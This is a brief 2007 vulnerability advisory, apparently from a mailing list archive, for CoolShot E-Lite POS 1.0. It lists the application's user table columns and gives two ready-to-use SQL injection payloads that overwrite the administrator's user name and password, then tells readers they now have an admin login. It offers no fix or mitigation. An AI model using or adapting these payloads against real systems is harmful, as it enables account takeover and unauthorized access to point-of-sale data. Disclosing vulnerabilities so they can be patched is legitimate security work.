<<< Date Index >>>     <<< Thread Index >>>

Aria-Security.net: CoolShot E-Lite POS 1.0

Aria-Security Team
http://aria-security.net
-------------------------------------
CoolShot E-Lite POS 1.0
http://coolshot.net/index.php/works/49-e-lite-pos

Original Advisory @ 
http://aria-security.net/forum/showthread.php?p=1108#post1108
Published on November 24 2007

users.user_id
users.user_name
users.user_email
users.user_admin
users.user_auth
users.user_pw


use these two queries
-1' UPDATE users set user_name= 'admin' Where(user_iD= '1');--
-1' UPDATE users set user_pw= 'hacked' Where(user_iD= '1');--

there you go with the user admin and password hacked.

Credits Goes to Aria-Security Team
A SPECIAL THANKS TO: AurA
Regards,
The-0utl4w